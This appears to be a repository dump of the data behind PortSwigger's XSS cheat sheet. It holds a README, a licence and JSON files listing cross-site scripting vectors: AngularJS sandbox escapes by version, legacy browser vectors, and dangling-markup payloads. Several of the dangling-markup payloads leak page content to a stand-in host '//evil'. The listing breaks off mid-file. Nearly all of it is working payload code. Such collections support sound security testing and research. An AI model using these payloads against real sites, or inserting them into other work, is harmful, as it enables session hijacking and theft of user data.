├── LICENSE
├── README.md
└── json
    ├── angularjs.json
    ├── classic.json
    ├── dangling_markup.json
    ├── encodings.json
    ├── events.json
    ├── frameworks.json
    ├── obfuscation.json
    ├── polyglot.json
    ├── protocols.json
    ├── restricted_characters.json
    ├── special_tags.json
    ├── useful_tags.json
    └── waf_bypass_global_obj.json


/LICENSE:
--------------------------------------------------------------------------------
1 | The copyright for this project belongs to PortSwigger Web Security. We do not want this data to be used to create derivative cheat sheets hosted elsewhere, so we are not providing a license. That said, you are free to fork this repo in order to create pull requests back.
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | This is the data that powers the [PortSwigger XSS cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet). We have put this data on Github so the community can contribute vectors via pull requests.
 2 | 
 3 | ## Contributing
 4 | 
 5 | To contribute please create a pull request with changes to the JSON data. 
 6 | 
 7 | For example, to add onwaiting to the data, do:
 8 | 
 9 | ```javascript
10 | "onwaiting": {
11 |         "description": "Fires when while waiting for the data",
12 |         "tags": [
13 |             {
14 |                 "tag": "video",
15 |                 "code": "<video autoplay controls onwaiting=alert(1)><source src=\"validvideo.mp4\" type=video\/mp4><\/video>",
16 |                 "browsers": [
17 |                     "edge"
18 |                 ],
19 |                 "interaction": false
20 |             }
21 |         ]
22 |     }
23 | ```
24 | 
25 | The tags array contains the tags supported by the vector and browser support. Supported browsers are chrome,safari,firefox,edge all in lowercase. The interaction flag specifies if the vector requires user interaction.
26 | 
27 | Please make sure you search the data to ensure your vector hasn't already been added.
28 | Please include your Twitter handle in the pull request message if you would like to be credited with it.
29 | 
30 | ## License
31 | 
32 | The copyright for this project belongs to PortSwigger Web Security. We do not want this data to be used to create derivative cheat sheets hosted elsewhere, so we are not providing a license. That said, you are free to fork this repo in order to create pull requests back.
33 | 


--------------------------------------------------------------------------------
/json/angularjs.json:
--------------------------------------------------------------------------------
  1 | [
  2 |     {
  3 |         "versionRange": "1.0.1 - 1.1.5",
  4 |         "version": "1.0.1",
  5 |         "authors": [
  6 |             {
  7 |                 "name": "Mario Heiderich",
  8 |                 "company": "Cure53",
  9 |                 "twitterUrl": "https:\/\/twitter.com\/cure53berlin"
 10 |             }
 11 |         ],
 12 |         "vector": "{{constructor.constructor('alert(1)')()}}",
 13 |         "hash": "",
 14 |         "type": "reflected",
 15 |         "csp": false
 16 |     },
 17 |     {
 18 |         "versionRange": "1.0.1 - 1.1.5 (shorter)",
 19 |         "version": "1.0.1",
 20 |         "authors": [
 21 |             {
 22 |                 "name": "Gareth Heyes",
 23 |                 "company": "PortSwigger",
 24 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
 25 |             },
 26 |             {
 27 |                 "name": "Lewis Ardern",
 28 |                 "company": "Synopsys",
 29 |                 "twitterUrl": "https:\/\/twitter.com\/LewisArdern"
 30 |             }
 31 |         ],
 32 |         "vector": "{{$on.constructor('alert(1)')()}}",
 33 |         "hash": "",
 34 |         "type": "reflected",
 35 |         "csp": false
 36 |     },
 37 |     {
 38 |         "versionRange": "1.2.0 - 1.2.1",
 39 |         "version": "1.2.0",
 40 |         "authors": [
 41 |             {
 42 |                 "name": "Jan Horn",
 43 |                 "company": "Google",
 44 |                 "twitterUrl": "https:\/\/twitter.com\/tehjh"
 45 |             }
 46 |         ],
 47 |         "vector": "{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}",
 48 |         "hash": "",
 49 |         "type": "reflected",
 50 |         "csp": false
 51 |     },
 52 |     {
 53 |         "versionRange": "1.2.2 - 1.2.5",
 54 |         "version": "1.2.2",
 55 |         "authors": [
 56 |             {
 57 |                 "name": "Gareth Heyes",
 58 |                 "company": "PortSwigger",
 59 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
 60 |             }
 61 |         ],
 62 |         "vector": "{{{}.\")));alert(1)\/\/\"}}",
 63 |         "hash": "",
 64 |         "type": "reflected",
 65 |         "csp": false
 66 |     },
 67 |     {
 68 |         "versionRange": "1.2.6 - 1.2.18",
 69 |         "version": "1.2.6",
 70 |         "authors": [
 71 |             {
 72 |                 "name": "Jan Horn",
 73 |                 "company": "Google",
 74 |                 "twitterUrl": "https:\/\/twitter.com\/tehjh"
 75 |             }
 76 |         ],
 77 |         "vector": "{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}",
 78 |         "hash": "",
 79 |         "type": "reflected",
 80 |         "csp": false
 81 |     },
 82 |     {
 83 |         "versionRange": "1.2.19 - 1.2.23",
 84 |         "version": "1.2.19",
 85 |         "authors": [
 86 |             {
 87 |                 "name": "Mathias Karlsson",
 88 |                 "company": "Detectify",
 89 |                 "twitterUrl": "https:\/\/twitter.com\/avlidienbrunn"
 90 |             }
 91 |         ],
 92 |         "vector": "{{toString.constructor.prototype.toString=toString.constructor.prototype.call;[\"a\",\"alert(1)\"].sort(toString.constructor);}}",
 93 |         "hash": "",
 94 |         "type": "reflected",
 95 |         "csp": false
 96 |     },
 97 |     {
 98 |         "versionRange": "1.2.24 - 1.2.29",
 99 |         "version": "1.2.24",
100 |         "authors": [
101 |             {
102 |                 "name": "Gareth Heyes",
103 |                 "company": "PortSwigger",
104 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
105 |             }
106 |         ],
107 |         "vector": "{{{}.\")));alert(1)\/\/\"}}",
108 |         "hash": "",
109 |         "type": "reflected",
110 |         "csp": false
111 |     },
112 |     {
113 |         "versionRange": "1.2.27-1.2.29\/1.3.0-1.3.20",
114 |         "version": "1.2.27",
115 |         "authors": [
116 |             {
117 |                 "name": "Gareth Heyes",
118 |                 "company": "PortSwigger",
119 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
120 |             }
121 |         ],
122 |         "vector": "{{{}.\")));alert(1)\/\/\"}}",
123 |         "hash": "",
124 |         "type": "reflected",
125 |         "csp": false
126 |     },
127 |     {
128 |         "versionRange": "1.3.0",
129 |         "version": "1.3.0",
130 |         "authors": [
131 |             {
132 |                 "name": "G\u00e1bor Moln\u00e1r",
133 |                 "company": "Google",
134 |                 "twitterUrl": "https:\/\/twitter.com\/molnar_g"
135 |             }
136 |         ],
137 |         "vector": "{{!ready && (ready = true) && (\n!call\n? $$watchers[0].get(toString.constructor.prototype)\n: (a = apply) &&\n(apply = constructor) &&\n(valueOf = call) &&\n(''+''.toString(\n'F = Function.prototype;' +\n'F.apply = F.a;' +\n'delete F.a;' +\n'delete F.valueOf;' +\n'alert(1);'\n)));}}",
138 |         "hash": "",
139 |         "type": "reflected",
140 |         "csp": false
141 |     },
142 |     {
143 |         "versionRange": "1.3.3 - 1.3.18",
144 |         "version": "1.3.3",
145 |         "authors": [
146 |             {
147 |                 "name": "Gareth Heyes",
148 |                 "company": "PortSwigger",
149 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
150 |             }
151 |         ],
152 |         "vector": "{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)\/\/');}}",
153 |         "hash": "",
154 |         "type": "reflected",
155 |         "csp": false
156 |     },
157 |     {
158 |         "versionRange": "1.3.19",
159 |         "version": "1.3.19",
160 |         "authors": [
161 |             {
162 |                 "name": "Gareth Heyes",
163 |                 "company": "PortSwigger",
164 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
165 |             }
166 |         ],
167 |         "vector": "{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)\/\/');}}",
168 |         "hash": "",
169 |         "type": "reflected",
170 |         "csp": false
171 |     },
172 |     {
173 |         "versionRange": "1.3.20",
174 |         "version": "1.3.20",
175 |         "authors": [
176 |             {
177 |                 "name": "Gareth Heyes",
178 |                 "company": "PortSwigger",
179 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
180 |             }
181 |         ],
182 |         "vector": "{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}",
183 |         "hash": "",
184 |         "type": "reflected",
185 |         "csp": false
186 |     },
187 |     {
188 |         "versionRange": "1.4.0 - 1.4.9",
189 |         "version": "1.4.0",
190 |         "authors": [
191 |             {
192 |                 "name": "Gareth Heyes",
193 |                 "company": "PortSwigger",
194 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
195 |             }
196 |         ],
197 |         "vector": "{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)\/\/');}}",
198 |         "hash": "",
199 |         "type": "reflected",
200 |         "csp": false
201 |     },
202 |     {
203 |         "versionRange": "1.5.0 - 1.5.8",
204 |         "version": "1.5.0",
205 |         "authors": [
206 |             {
207 |                 "name": "Ian Hickey",
208 |                 "company": "",
209 |                 "twitterUrl": "https:\/\/twitter.com\/ianhickey1024"
210 |             },
211 |             {
212 |                 "name": "Gareth Heyes",
213 |                 "company": "PortSwigger",
214 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
215 |             }
216 |         ],
217 |         "vector": "{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}",
218 |         "hash": "",
219 |         "type": "reflected",
220 |         "csp": false
221 |     },
222 |     {
223 |         "versionRange": "1.5.9 - 1.5.11",
224 |         "version": "1.5.9",
225 |         "authors": [
226 |             {
227 |                 "name": "Jan Horn",
228 |                 "company": "Google",
229 |                 "twitterUrl": "https:\/\/twitter.com\/tehjh"
230 |             }
231 |         ],
232 |         "vector": "{{\nc=''.sub.call;b=''.sub.bind;a=''.sub.apply;\nc.$apply=$apply;c.$eval=b;op=$root.$$phase;\n$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;\nC=c.$apply(c);$root.$$phase=op;$root.$digest=od;\nB=C(b,c,b);$evalAsync(\"\nastNode=pop();astNode.type='UnaryExpression';\nastNode.operator='(window.X?void0:(window.X=true,alert(1)))+';\nastNode.argument={type:'Identifier',name:'foo'};\n\");\nm1=B($$asyncQueue.pop().expression,null,$root);\nm2=B(C,null,m1);[].push.apply=m2;a=''.sub;\n$eval('a(b.c)');[].push.apply=a;\n}}",
233 |         "hash": "",
234 |         "type": "reflected",
235 |         "csp": false
236 |     },
237 |     {
238 |         "versionRange": ">=1.6.0",
239 |         "version": "1.6.0",
240 |         "authors": [
241 |             {
242 |                 "name": "Mario Heiderich",
243 |                 "company": "Cure53",
244 |                 "twitterUrl": "https:\/\/twitter.com\/cure53berlin"
245 |             }
246 |         ],
247 |         "vector": "{{constructor.constructor('alert(1)')()}}",
248 |         "hash": "",
249 |         "type": "reflected",
250 |         "csp": false
251 |     },
252 |     {
253 |         "versionRange": ">=1.6.0 (shorter)",
254 |         "version": "1.6.0",
255 |         "authors": [
256 |             {
257 |                 "name": "Gareth Heyes",
258 |                 "company": "PortSwigger",
259 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
260 |             },
261 |             {
262 |                 "name": "Lewis Ardern",
263 |                 "company": "Synopsys",
264 |                 "twitterUrl": "https:\/\/twitter.com\/LewisArdern"
265 |             }
266 |         ],
267 |         "vector": "{{$on.constructor('alert(1)')()}}",
268 |         "hash": "",
269 |         "type": "reflected",
270 |         "csp": false
271 |     },
272 |     {
273 |         "versionRange": "1.0.1 - 1.1.5",
274 |         "version": "1.0.1",
275 |         "authors": [
276 |             {
277 |                 "name": "Mario Heiderich",
278 |                 "company": "Cure53",
279 |                 "twitterUrl": "https:\/\/twitter.com\/cure53berlin"
280 |             }
281 |         ],
282 |         "vector": "constructor.constructor('alert(1)')()",
283 |         "hash": "",
284 |         "type": "dom",
285 |         "csp": false
286 |     },
287 |     {
288 |         "versionRange": "1.2.0 - 1.2.18",
289 |         "version": "1.2.0",
290 |         "authors": [
291 |             {
292 |                 "name": "Jan Horn",
293 |                 "company": "Google",
294 |                 "twitterUrl": "https:\/\/twitter.com\/tehjh"
295 |             }
296 |         ],
297 |         "vector": "a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()",
298 |         "hash": "",
299 |         "type": "dom",
300 |         "csp": false
301 |     },
302 |     {
303 |         "versionRange": "1.2.19 - 1.2.23",
304 |         "version": "1.2.19",
305 |         "authors": [
306 |             {
307 |                 "name": "Mathias Karlsson",
308 |                 "company": "Detectify",
309 |                 "twitterUrl": "https:\/\/twitter.com\/avlidienbrunn"
310 |             }
311 |         ],
312 |         "vector": "toString.constructor.prototype.toString=toString.constructor.prototype.call;[\"a\",\"alert(1)\"].sort(toString.constructor)",
313 |         "hash": "",
314 |         "type": "dom",
315 |         "csp": false
316 |     },
317 |     {
318 |         "versionRange": "1.2.24 - 1.2.26",
319 |         "version": "1.2.24",
320 |         "authors": [
321 |             {
322 |                 "name": "Gareth Heyes",
323 |                 "company": "PortSwigger",
324 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
325 |             }
326 |         ],
327 |         "vector": "{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()",
328 |         "hash": "",
329 |         "type": "dom",
330 |         "csp": false
331 |     },
332 |     {
333 |         "versionRange": "1.2.27-1.2.29\/1.3.0-1.3.20",
334 |         "version": "1.2.27",
335 |         "authors": [
336 |             {
337 |                 "name": "Gareth Heyes",
338 |                 "company": "PortSwigger",
339 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
340 |             }
341 |         ],
342 |         "vector": "{}.\")));alert(1)\/\/\";",
343 |         "hash": "",
344 |         "type": "dom",
345 |         "csp": false
346 |     },
347 |     {
348 |         "versionRange": "1.4.0-1.4.5",
349 |         "version": "1.4.0",
350 |         "authors": [
351 |             {
352 |                 "name": "Gareth Heyes",
353 |                 "company": "PortSwigger",
354 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
355 |             }
356 |         ],
357 |         "vector": "'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)\/\/';",
358 |         "hash": "",
359 |         "type": "dom",
360 |         "csp": false
361 |     },
362 |     {
363 |         "versionRange": ">=1.6.0",
364 |         "version": "1.6.0",
365 |         "authors": [
366 |             {
367 |                 "name": "Mario Heiderich",
368 |                 "company": "Cure53",
369 |                 "twitterUrl": "https:\/\/twitter.com\/cure53berlin"
370 |             }
371 |         ],
372 |         "vector": "constructor.constructor('alert(1)')()",
373 |         "hash": "",
374 |         "type": "dom",
375 |         "csp": false
376 |     },
377 |     {
378 |         "versionRange": "1.4.4 (without strings)",
379 |         "version": "1.4.4",
380 |         "authors": [
381 |             {
382 |                 "name": "Gareth Heyes",
383 |                 "company": "PortSwigger",
384 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
385 |             }
386 |         ],
387 |         "vector": "toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)",
388 |         "hash": "",
389 |         "type": "dom",
390 |         "csp": false
391 |     },
392 |     {
393 |         "versionRange": "All versions (Chrome)",
394 |         "version": "1.4.5",
395 |         "authors": [
396 |             {
397 |                 "name": "Gareth Heyes",
398 |                 "company": "PortSwigger",
399 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
400 |             }
401 |         ],
402 |         "vector": "<input autofocus ng-focus=\"$event.path|orderBy:'[].constructor.from([1],alert)'\">",
403 |         "hash": "",
404 |         "type": "reflected",
405 |         "csp": true
406 |     },
407 |     {
408 |         "versionRange": "All versions (Chrome) shorter",
409 |         "version": "1.4.5",
410 |         "authors": [
411 |             {
412 |                 "name": "Gareth Heyes",
413 |                 "company": "PortSwigger",
414 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
415 |             }
416 |         ],
417 |         "vector": "<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>",
418 |         "hash": "#x",
419 |         "type": "reflected",
420 |         "csp": true
421 |     },
422 |     {
423 |         "versionRange": "All versions (all browsers) shorter",
424 |         "version": "1.4.5",
425 |         "authors": [
426 |             {
427 |                 "name": "Gareth Heyes",
428 |                 "company": "PortSwigger",
429 |                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"
430 |             }
431 |         ],
432 |         "vector": "<input autofocus ng-focus=\"$event.composedPath()|orderBy:'[].constructor.from([1],alert)'\">",
433 |         "hash": "#x",
434 |         "type": "reflected",
435 |         "csp": true
436 |     },
437 |     {
438 |         "versionRange": "1.2.0 - 1.5.0",
439 |         "version": "1.4.5",
440 |         "authors": [
441 |             {
442 |                 "name": "Eduardo Vela",
443 |                 "company": "Google",
444 |                 "twitterUrl": "https:\/\/twitter.com\/sirdarckcat"
445 |             }
446 |         ],
447 |         "vector": "<div ng-app ng-csp><div ng-focus=\"x=$event;\" id=f tabindex=0>foo<\/div><div ng-repeat=\"(key, value) in x.view\"><div ng-if=\"key == 'window'\">{{ [1].reduce(value.alert, 1); }}<\/div><\/div><\/div>",
448 |         "hash": "#f",
449 |         "type": "reflected",
450 |         "csp": true
451 |     }
452 | ]
453 | 


--------------------------------------------------------------------------------
/json/classic.json:
--------------------------------------------------------------------------------
 1 | [
 2 |     {
 3 |         "description": "Image src with JavaScript protocol",
 4 |         "code": "<img src=\"javascript:alert(1)\">",
 5 |         "browsers": []
 6 |     },
 7 |     {
 8 |         "description": "Body background with JavaScript protocol",
 9 |         "code": "<body background=\"javascript:alert(1)\">",
10 |         "browsers": []
11 |     },
12 |     {
13 |         "description": "Iframe data urls no longer work as modern browsers use a null origin",
14 |         "code": "<iframe src=\"data:text\/html,<img src=1 onerror=alert(document.domain)>\">",
15 |         "browsers": []
16 |     },
17 |     {
18 |         "description": "VBScript protocol used to work in IE",
19 |         "code": "<a href=\"vbscript:MsgBox+1\">XSS<\/a>\n<a href=\"#\" onclick=\"vbs:Msgbox+1\">XSS<\/a>\n<a href=\"#\" onclick=\"VBS:Msgbox+1\">XSS<\/a>\n<a href=\"#\" onclick=\"vbscript:Msgbox+1\">XSS<\/a>\n<a href=\"#\" onclick=\"VBSCRIPT:Msgbox+1\">XSS<\/a>\n<a href=\"#\" language=vbs onclick=\"vbscript:Msgbox+1\">XSS<\/a>",
20 |         "browsers": []
21 |     },
22 |     {
23 |         "description": "JScript compact was a minimal version of JS that wasn't widely used in IE",
24 |         "code": "<a href=\"#\" onclick=\"jscript.compact:alert(1);\">test<\/a>\n<a href=\"#\" onclick=\"JSCRIPT.COMPACT:alert(1);\">test<\/a>",
25 |         "browsers": []
26 |     },
27 |     {
28 |         "description": "JScript.Encode allows encoded JavaScript",
29 |         "code": "<a href=# language=\"JScript.Encode\" onclick=\"#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@\">XSS<\/a>\n<a href=# onclick=\"JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@\">XSS<\/a>",
30 |         "browsers": []
31 |     },
32 |     {
33 |         "description": "VBScript.Encoded allows encoded VBScript",
34 |         "code": "<iframe onload=VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@>\n<iframe language=VBScript.Encode onload=#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@>",
35 |         "browsers": []
36 |     },
37 |     {
38 |         "description": "JavaScript entities used to work in Netscape Navigator",
39 |         "code": "<a title=\"&{alert(1)}\">XSS<\/a>",
40 |         "browsers": []
41 |     },
42 |     {
43 |         "description": "JavaScript stylesheets used to be supported by Netscape Navigator",
44 |         "code": "<link href=\"xss.js\" rel=stylesheet type=\"text\/javascript\">",
45 |         "browsers": []
46 |     },
47 |     {
48 |         "description": "Button used to consume markup",
49 |         "code": "<form><button name=x formaction=x><b>stealme",
50 |         "browsers": []
51 |     },
52 |     {
53 |         "description": "IE9 select elements and plaintext used to consume markup",
54 |         "code": "<form action=x><button>XSS<\/button><select name=x><option><plaintext><script>token=\"supersecret\"<\/script>",
55 |         "browsers": []
56 |     },
57 |     {
58 |         "description": "XBL Firefox only <= 2",
59 |         "code": "<div style=\"-moz-binding:url(\/\/businessinfo.co.uk\/labs\/xbl\/xbl.xml#xss)\">\n<div style=\"\\-\\mo\\z-binding:url(\/\/businessinfo.co.uk\/labs\/xbl\/xbl.xml#xss)\">\n<div style=\"-moz-bindin\\67:url(\/\/businessinfo.co.uk\/lab s\/xbl\/xbl.xml#xss)\">\n<div style=\"-moz-bindin&#x5c;67:url(\/\/businessinfo.co.uk\/lab s\/xbl\/xbl.xml#xss)\">",
60 |         "browsers": []
61 |     },
62 |     {
63 |         "description": "XBL also worked in FF3.5 using data urls",
64 |         "code": "<img src=\"blah\" style=\"-moz-binding: url(data:text\/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A\/\/www.mozilla.org\/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C\/constructor%3E%3C\/implementation%3E%3C\/ binding%3E%3C\/bindings%3E)\" \/>",
65 |         "browsers": []
66 |     },
67 |     {
68 |         "description": "CSS expressions <=IE7",
69 |         "code": "<div style=xss:expression(alert(1))>\n<div style=xss:expression(1)-alert(1)>\n<div style=xss:expressio\\6e(alert(1))>\n<div style=xss:expressio\\006e(alert(1))>\n<div style=xss:expressio\\00006e(alert(1))>\n<div style=xss:expressio\\6e(alert(1))>\n<div style=xss:expressio&#x5c;6e(alert(1))>",
70 |         "browsers": []
71 |     },
72 |     {
73 |         "description": "In quirks mode IE allowed you to use = instead of :",
74 |         "code": "<div style=xss=expression(alert(1))>\n<div style=\"color&#x3dred\">test<\/div>",
75 |         "browsers": []
76 |     },
77 |     {
78 |         "description": "Behaviors for older modes of IE",
79 |         "code": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XSS<\/a>",
80 |         "browsers": []
81 |     },
82 |     {
83 |         "description": "Older versions of IE supported event handlers in functions",
84 |         "code": "<script>\nfunction window.onload(){\nalert(1);\n}\n<\/script>\n<script>\nfunction window::onload(){\nalert(1);\n}\n<\/script>\n<script>\nfunction window.location(){\n}\n<\/script>\n<body>\n<script>\nfunction\/*<img src=1 onerror=alert(1)>*\/document.body.innerHTML(){}\n<\/script>\n<\/body>\n<body>\n<script>\nfunction document.body.innerHTML(){ x = \"<img src=1 onerror=alert(1)>\"; }\n<\/script>\n<\/body>",
85 |         "browsers": []
86 |     },
87 |     {
88 |         "description": "GreyMagic HTML+time exploit (no longer works even in 5 docmode)",
89 |         "code": "<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS<img src=1 onerror=alert(1)>\"> <\/BODY><\/HTML>",
90 |         "browsers": []
91 |     }
92 | ]


--------------------------------------------------------------------------------
/json/dangling_markup.json:
--------------------------------------------------------------------------------
  1 | [
  2 |     {
  3 |         "description": "Background attribute",
  4 |         "code": "<body background=\"\/\/evil?\n<table background=\"\/\/evil?\n<table><thead background=\"\/\/evil?\n<table><tbody background=\"\/\/evil?\n<table><tfoot background=\"\/\/evil?\n<table><td background=\"\/\/evil?\n<table><th background=\"\/\/evil?",
  5 |         "browsers": [
  6 |             "chrome",
  7 |             "firefox",
  8 |             "edge",
  9 |             "safari"
 10 |         ]
 11 |     },
 12 |     {
 13 |         "description": "Link href stylesheet",
 14 |         "code": "<link rel=stylesheet href=\"\/\/evil?",
 15 |         "browsers": [
 16 |             "chrome",
 17 |             "firefox",
 18 |             "edge",
 19 |             "safari"
 20 |         ]
 21 |     },
 22 |     {
 23 |         "description": "Link href icon",
 24 |         "code": "<link rel=icon href=\"\/\/evil?",
 25 |         "browsers": [
 26 |             "chrome",
 27 |             "firefox",
 28 |             "edge",
 29 |             "safari"
 30 |         ]
 31 |     },
 32 |     {
 33 |         "description": "Meta refresh",
 34 |         "code": "<meta http-equiv=\"refresh\" content=\"0; http:\/\/evil?",
 35 |         "browsers": [
 36 |             "chrome",
 37 |             "firefox",
 38 |             "edge",
 39 |             "safari"
 40 |         ]
 41 |     },
 42 |     {
 43 |         "description": "Img to pass markup through src attribute",
 44 |         "code": "<img src=\"\/\/evil?\n<image src=\"\/\/evil?",
 45 |         "browsers": [
 46 |             "chrome",
 47 |             "firefox",
 48 |             "edge",
 49 |             "safari"
 50 |         ]
 51 |     },
 52 |     {
 53 |         "description": "Video using track element",
 54 |         "code": "<video><track default src=\"\/\/evil?",
 55 |         "browsers": [
 56 |             "chrome",
 57 |             "firefox",
 58 |             "edge",
 59 |             "safari"
 60 |         ]
 61 |     },
 62 |     {
 63 |         "description": "Video using source element and src attribute",
 64 |         "code": "<video><source src=\"\/\/evil?",
 65 |         "browsers": [
 66 |             "chrome",
 67 |             "firefox",
 68 |             "edge",
 69 |             "safari"
 70 |         ]
 71 |     },
 72 |     {
 73 |         "description": "Audio using source element and src attribute",
 74 |         "code": "<audio><source src=\"\/\/evil?",
 75 |         "browsers": [
 76 |             "chrome",
 77 |             "firefox",
 78 |             "edge",
 79 |             "safari"
 80 |         ]
 81 |     },
 82 |     {
 83 |         "description": "Input src",
 84 |         "code": "<input type=image src=\"\/\/evil?",
 85 |         "browsers": [
 86 |             "chrome",
 87 |             "firefox",
 88 |             "edge",
 89 |             "safari"
 90 |         ]
 91 |     },
 92 |     {
 93 |         "description": "Button using formaction",
 94 |         "code": "<form><button style=\"width:100%;height:100%\" type=submit formaction=\"\/\/evil?",
 95 |         "browsers": [
 96 |             "chrome",
 97 |             "firefox",
 98 |             "edge",
 99 |             "safari"
100 |         ]
101 |     },
102 |     {
103 |         "description": "Input using formaction",
104 |         "code": "<form><input type=submit value=\"XSS\" style=\"width:100%;height:100%\" type=submit formaction=\"\/\/evil?",
105 |         "browsers": [
106 |             "chrome",
107 |             "firefox",
108 |             "edge",
109 |             "safari"
110 |         ]
111 |     },
112 |     {
113 |         "description": "Form using action",
114 |         "code": "<button form=x style=\"width:100%;height:100%;\"><form id=x action=\"\/\/evil?",
115 |         "browsers": [
116 |             "chrome",
117 |             "firefox",
118 |             "edge",
119 |             "safari"
120 |         ]
121 |     },
122 |     {
123 |         "description": "Isindex using src attribute",
124 |         "code": "<isindex type=image src=\"\/\/evil?",
125 |         "browsers": [
126 |             "edge"
127 |         ]
128 |     },
129 |     {
130 |         "description": "Isindex using submit",
131 |         "code": "<isindex type=submit style=width:100%;height:100%; value=XSS formaction=\"\/\/evil?",
132 |         "browsers": [
133 |             "edge"
134 |         ]
135 |     },
136 |     {
137 |         "description": "Object data",
138 |         "code": "<object data=\"\/\/evil?",
139 |         "browsers": [
140 |             "chrome",
141 |             "firefox",
142 |             "edge",
143 |             "safari"
144 |         ]
145 |     },
146 |     {
147 |         "description": "Iframe src",
148 |         "code": "<iframe src=\"\/\/evil?",
149 |         "browsers": [
150 |             "chrome",
151 |             "firefox",
152 |             "edge",
153 |             "safari"
154 |         ]
155 |     },
156 |     {
157 |         "description": "Embed src",
158 |         "code": "<embed src=\"\/\/evil?",
159 |         "browsers": [
160 |             "chrome",
161 |             "firefox",
162 |             "edge",
163 |             "safari"
164 |         ]
165 |     },
166 |     {
167 |         "description": "Use textarea to consume markup and post to external site",
168 |         "code": "<form><button formaction=\/\/evil>XSS<\/button><textarea name=x>",
169 |         "browsers": [
170 |             "firefox",
171 |             "edge",
172 |             "safari"
173 |         ]
174 |     },
175 |     {
176 |         "description": "Pass markup data through window.name using form target",
177 |         "code": "<button form=x>XSS<\/button><form id=x action=\/\/evil target='",
178 |         "browsers": [
179 |             "chrome",
180 |             "firefox",
181 |             "edge",
182 |             "safari"
183 |         ]
184 |     },
185 |     {
186 |         "description": "Pass markup data through window.name using base target",
187 |         "code": "<a href=http:\/\/subdomain1.portswigger-labs.net\/dangling_markup\/name.html><font size=100 color=red>You must click me<\/font><\/a><base target=\"",
188 |         "browsers": [
189 |             "chrome",
190 |             "firefox",
191 |             "edge",
192 |             "safari"
193 |         ]
194 |     },
195 |     {
196 |         "description": "Pass markup data through window.name using formtarget",
197 |         "code": "<form><input type=submit value=\"Click me\" formaction=http:\/\/subdomain1.portswigger-labs.net\/dangling_markup\/name.html formtarget=\"",
198 |         "browsers": [
199 |             "chrome",
200 |             "firefox",
201 |             "edge",
202 |             "safari"
203 |         ]
204 |     },
205 |     {
206 |         "description": "Using base href to pass data",
207 |         "code": "<a href=abc style=\"width:100%;height:100%;position:absolute;font-size:1000px;\">xss<base href=\"\/\/evil\/",
208 |         "browsers": [
209 |             "chrome",
210 |             "firefox",
211 |             "edge",
212 |             "safari"
213 |         ]
214 |     },
215 |     {
216 |         "description": "Using embed window name to pass data from the page",
217 |         "code": "<embed src=http:\/\/subdomain1.portswigger-labs.net\/dangling_markup\/name.html name=\"",
218 |         "browsers": [
219 |             "chrome",
220 |             "firefox",
221 |             "edge",
222 |             "safari"
223 |         ]
224 |     },
225 |     {
226 |         "description": "Using iframe window name to pass data from the page",
227 |         "code": "<iframe src=http:\/\/subdomain1.portswigger-labs.net\/dangling_markup\/name.html name=\"",
228 |         "browsers": [
229 |             "chrome",
230 |             "firefox",
231 |             "edge",
232 |             "safari"
233 |         ]
